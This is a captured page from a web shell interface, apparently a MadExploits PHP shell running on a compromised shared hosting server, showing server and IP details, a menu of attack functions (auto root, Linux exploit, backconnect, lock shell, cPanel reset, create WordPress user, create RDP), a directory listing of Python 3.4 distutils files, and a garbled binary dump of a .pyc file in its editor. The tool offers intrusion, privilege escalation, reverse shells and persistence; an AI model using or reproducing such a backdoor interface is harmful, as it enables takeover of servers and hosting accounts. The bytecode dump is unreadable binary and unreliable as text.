Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.137.185.66
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python34 /
lib64 /
python3.4 /
distutils /
command /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-34.pyc
571
B
-rw-r--r--
__init__.cpython-34.pyo
571
B
-rw-r--r--
bdist.cpython-34.pyc
3.94
KB
-rw-r--r--
bdist.cpython-34.pyo
3.94
KB
-rw-r--r--
bdist_dumb.cpython-34.pyc
3.88
KB
-rw-r--r--
bdist_dumb.cpython-34.pyo
3.88
KB
-rw-r--r--
bdist_msi.cpython-34.pyc
21.33
KB
-rw-r--r--
bdist_msi.cpython-34.pyo
21.23
KB
-rw-r--r--
bdist_rpm.cpython-34.pyc
13.98
KB
-rw-r--r--
bdist_rpm.cpython-34.pyo
13.91
KB
-rw-r--r--
bdist_wininst.cpython-34.pyc
8.64
KB
-rw-r--r--
bdist_wininst.cpython-34.pyo
8.57
KB
-rw-r--r--
build.cpython-34.pyc
3.97
KB
-rw-r--r--
build.cpython-34.pyo
3.97
KB
-rw-r--r--
build_clib.cpython-34.pyc
5.32
KB
-rw-r--r--
build_clib.cpython-34.pyo
5.32
KB
-rw-r--r--
build_ext.cpython-34.pyc
16.73
KB
-rw-r--r--
build_ext.cpython-34.pyo
16.73
KB
-rw-r--r--
build_py.cpython-34.pyc
11.26
KB
-rw-r--r--
build_py.cpython-34.pyo
11.19
KB
-rw-r--r--
build_scripts.cpython-34.pyc
4.63
KB
-rw-r--r--
build_scripts.cpython-34.pyo
4.63
KB
-rw-r--r--
check.cpython-34.pyc
5.14
KB
-rw-r--r--
check.cpython-34.pyo
5.14
KB
-rw-r--r--
clean.cpython-34.pyc
2.32
KB
-rw-r--r--
clean.cpython-34.pyo
2.32
KB
-rw-r--r--
config.cpython-34.pyc
10.8
KB
-rw-r--r--
config.cpython-34.pyo
10.8
KB
-rw-r--r--
install.cpython-34.pyc
14.77
KB
-rw-r--r--
install.cpython-34.pyo
14.77
KB
-rw-r--r--
install_data.cpython-34.pyc
2.49
KB
-rw-r--r--
install_data.cpython-34.pyo
2.49
KB
-rw-r--r--
install_egg_info.cpython-34.py...
3.12
KB
-rw-r--r--
install_egg_info.cpython-34.py...
3.12
KB
-rw-r--r--
install_headers.cpython-34.pyc
1.81
KB
-rw-r--r--
install_headers.cpython-34.pyo
1.81
KB
-rw-r--r--
install_lib.cpython-34.pyc
5.56
KB
-rw-r--r--
install_lib.cpython-34.pyo
5.56
KB
-rw-r--r--
install_scripts.cpython-34.pyc
2.33
KB
-rw-r--r--
install_scripts.cpython-34.pyo
2.33
KB
-rw-r--r--
register.cpython-34.pyc
9.04
KB
-rw-r--r--
register.cpython-34.pyo
9.04
KB
-rw-r--r--
sdist.cpython-34.pyc
13.86
KB
-rw-r--r--
sdist.cpython-34.pyo
13.86
KB
-rw-r--r--
upload.cpython-34.pyc
5.67
KB
-rw-r--r--
upload.cpython-34.pyo
5.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bdist_rpm.cpython-34.pyc
� h f�T � @ s� d Z d d l Z d d l Z d d l Z d d l m Z d d l m Z d d l m Z d d l m Z d d l Td d l m Z d d l m Z Gd d � d e � Z d S)zwdistutils.command.bdist_rpm Implements the Distutils 'bdist_rpm' command (create RPM source and binary distributions).� N)�Command)�DEBUG)�get_platform)� write_file)�*)�get_python_version)�logc + @ s e Z d Z d Z df dg dh di dj dk dl dm dn do dp dq dr ds dt du dv dw dx dy dz d{ d| d} d~ d d� d� d� d� d� d� d� d� d� d� d� d� d� d� d� g) Z d4 d9 d= d2 dU g Z i d4 d7 6d9 d; 6d= d? 6Z dX dY � Z dZ d[ � Z d\ d] � Z d^ d_ � Z d` da � Z db dc � Z dd de � Z d S)�� bdist_rpmzcreate an RPM distribution�bdist-base=N�/base directory for creating built distributions� rpm-base=�dbase directory for creating RPMs (defaults to "rpm" under --bdist-base; must be specified for RPM 2)� dist-dir=�d�Ddirectory to put final RPM files in (and .spec files if --spec-only)�python=�Mpath to Python interpreter to hard-code in the .spec file (default: "python")� fix-python�Lhard-code the exact path to the current Python interpreter in the .spec file� spec-only�only regenerate spec file�source-only�only generate source RPM�binary-only�only generate binary RPM� use-bzip2�7use bzip2 instead of gzip to create source distribution�distribution-name=�gname of the (Linux) distribution to which this RPM applies (*not* the name of the module distribution!)�group=�9package classification [default: "Development/Libraries"]�release=�RPM release number�serial=�RPM serial number�vendor=�aRPM "vendor" (eg. "Joe Blow <joe@example.com>") [default: maintainer or author from setup script]� packager=�ARPM packager (eg. "Jane Doe <jane@example.net>")[default: vendor]� doc-files=�6list of documentation files (space or comma-separated)� changelog=� RPM changelog�icon=�name of icon file� provides=�%capabilities provided by this package� requires=�%capabilities required by this package� conflicts=�-capabilities which conflict with this package�build-requires=�+capabilities required to build this package� obsoletes=�*capabilities made obsolete by this package� no-autoreq�+do not automatically calculate dependencies� keep-temp�k�"don't clean up RPM build directory�no-keep-temp�&clean up RPM build directory [default]�use-rpm-opt-flags�8compile with RPM_OPT_FLAGS when building from source RPM�no-rpm-opt-flags�&do not pass any RPM CFLAGS to compiler� rpm3-mode�"RPM 3 compatibility mode (default)� rpm2-mode�RPM 2 compatibility mode�prep-script=�3Specify a script for the PREP phase of RPM building� build-script=�4Specify a script for the BUILD phase of RPM building�pre-install=�:Specify a script for the pre-INSTALL phase of RPM building�install-script=�6Specify a script for the INSTALL phase of RPM building� post-install=�;Specify a script for the post-INSTALL phase of RPM building�pre-uninstall=�<Specify a script for the pre-UNINSTALL phase of RPM building�post-uninstall=�=Specify a script for the post-UNINSTALL phase of RPM building� clean-script=�4Specify a script for the CLEAN phase of RPM building�verify-script=�6Specify a script for the VERIFY phase of the RPM build�force-arch=�0Force an architecture onto the RPM build process�quiet�q�3Run the INSTALL phase of RPM building in quiet modec C sc d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _ d | _! d | _"